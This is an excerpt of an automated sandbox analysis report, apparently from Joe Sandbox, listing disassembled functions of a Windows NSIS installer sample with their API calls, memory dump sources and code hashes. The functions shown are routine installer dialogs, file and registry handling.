                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                              • String ID: MS Shell Dlg
                                                                                                                                                                                              • API String ID: 3808545654-76309092
                                                                                                                                                                                              • Opcode ID: 0e1e500c30e805fc948415589c08143fac03f34b0e69f739ebe91b2620e6c296
                                                                                                                                                                                              • Instruction ID: 2f87ef527a079fcd98b3174ff93e15f92fad6858fb92d4176ae60913c966d855
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e1e500c30e805fc948415589c08143fac03f34b0e69f739ebe91b2620e6c296
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A01B575604240BFE700ABF1AE0ABDD7FB5AB55309F10887DF641B61E2DA7840458B2D
                                                                                                                                                                                              Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                                                              • MulDiv.KERNEL32(0505BB1A,00000064,0505D940), ref: 00402E3C
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                              • String ID: verifying installer: %d%%
                                                                                                                                                                                              • API String ID: 1451636040-82062127
                                                                                                                                                                                              • Opcode ID: 087799c81dd47644162d60d698aafe3a885b0c6ac9c219555e2ca42e9c1670eb
                                                                                                                                                                                              • Instruction ID: dfd142ddc65d39fdaa73b229a9921dc7c235b7e072e3123d651e00bd55f03bcf
                                                                                                                                                                                              • Opcode Fuzzy Hash: 087799c81dd47644162d60d698aafe3a885b0c6ac9c219555e2ca42e9c1670eb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 60014F7164020CABEF209F60DE49FAE3B69AB44304F008439FA06B51E0DBB895558B98
                                                                                                                                                                                              Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2667972263-0
                                                                                                                                                                                              • Opcode ID: 119b9e301f9c75836b9179208c0dbdb6f02c12704b392f46658d181c58c9b0fc
                                                                                                                                                                                              • Instruction ID: 85d8fb478e53a7d33050a02afe9876517184a336e4e72b82bbd0c3cba42884f9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 119b9e301f9c75836b9179208c0dbdb6f02c12704b392f46658d181c58c9b0fc
                                                                                                                                                                                              • Instruction Fuzzy Hash: D121AEB1800128BBDF116FA5DE89DDE7E79EF08364F14423AF960762E0CB794C418B98
                                                                                                                                                                                              Function 0040654E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,004DF000,004DF000,004CB000,0040336A,004DF000,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                              • CharNextW.USER32(?,00000000,004DF000,004DF000,004CB000,0040336A,004DF000,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                              • CharPrevW.USER32(?,?,004DF000,004DF000,004CB000,0040336A,004DF000,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                                              • String ID: *?|<>/":
                                                                                                                                                                                              • API String ID: 589700163-165019052
                                                                                                                                                                                              • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                              • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                                                                                                                                                                              • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                              • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                                                                                                                                                                              Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dll,00002000,?,?,00000021), ref: 004025E8
                                                                                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dll,?,?,C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dll,00002000,?,?,00000021), ref: 004025F3
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp$C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dll
                                                                                                                                                                                              • API String ID: 3109718747-3977801443
                                                                                                                                                                                              • Opcode ID: 991fae946bdf019a7c315e2a20c045ecd4589044c4e58f1009f440a7fe048d5b
                                                                                                                                                                                              • Instruction ID: b23dc685b5da5394ac89c8ab13f2cbf985e24fd8d9932a4f5164fd221fdd45c5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 991fae946bdf019a7c315e2a20c045ecd4589044c4e58f1009f440a7fe048d5b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 76110B72A04201BADB146FF18E89A9F76659F44398F204C3FF102F61D1EAFC89415B5D
                                                                                                                                                                                              Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                                              • Opcode ID: aa13740a01abf0a12383255fbb6bacfc07128faef757ca7dce2eb0223a04ec7c
                                                                                                                                                                                              • Instruction ID: d9fd13ec482603559a9c09f77eb5ae76b99fbdc016b4c624d38ebcad95bf5f4c
                                                                                                                                                                                              • Opcode Fuzzy Hash: aa13740a01abf0a12383255fbb6bacfc07128faef757ca7dce2eb0223a04ec7c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 28F0FF72A04518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F61A0CA749D519B78
                                                                                                                                                                                              Function 00404ADE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(00450248,00450248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00450248), ref: 00404B9B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                              • String ID: %u.%u%s%s
                                                                                                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                                                                                                              • Opcode ID: c75ab1504dd8104253bdc04bf71218fd338cad173e8ef5afb4fab122f1cee964
                                                                                                                                                                                              • Instruction ID: 65d6ef813479b3ccfd969ec0db039784a4d8c6b5967a53089d3579ec78c560c8
                                                                                                                                                                                              • Opcode Fuzzy Hash: c75ab1504dd8104253bdc04bf71218fd338cad173e8ef5afb4fab122f1cee964
                                                                                                                                                                                              • Instruction Fuzzy Hash: 401193736041282ADB00656D9C45F9E369C9B85334F25423BFA65F21D1E979D82582E8
                                                                                                                                                                                              Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$Enum
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 464197530-0
                                                                                                                                                                                              • Opcode ID: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
                                                                                                                                                                                              • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                                                                                                                                                                              • Opcode Fuzzy Hash: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
                                                                                                                                                                                              • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                                                                                                                                                                              Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2102729457-0
                                                                                                                                                                                              • Opcode ID: 924f9f108daf828ee83ef716cb3535c52cefc1d4ff45c1c6af266e6598bfdb86
                                                                                                                                                                                              • Instruction ID: 9c0cd9c85579b1f1539786df4f617efd254904ce91a486f6a135d178cfad0ab8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 924f9f108daf828ee83ef716cb3535c52cefc1d4ff45c1c6af266e6598bfdb86
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AF05E30485630EBD6506B20FE0CACB7BA5FB84B41B0149BAF005B11E4D7B85880CBDC
                                                                                                                                                                                              Function 00405296 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004052C5
                                                                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                                                                                                                                                                • Part of subcall function 0040427D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                                                              • Opcode ID: 7d5e46cc1e5f02d88c983cfba86e53e431cbed6f21b5100807b47a566b29449e
                                                                                                                                                                                              • Instruction ID: 334c9fee3abb3f39d596823d3a3537c7effd0098edc8ca0b3d981ed7cb288a41
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d5e46cc1e5f02d88c983cfba86e53e431cbed6f21b5100807b47a566b29449e
                                                                                                                                                                                              • Instruction Fuzzy Hash: F9015A31100709ABEB205F51DD94A9B3B26EB84795F20507AFA007A1D1D7BA9C919E2E
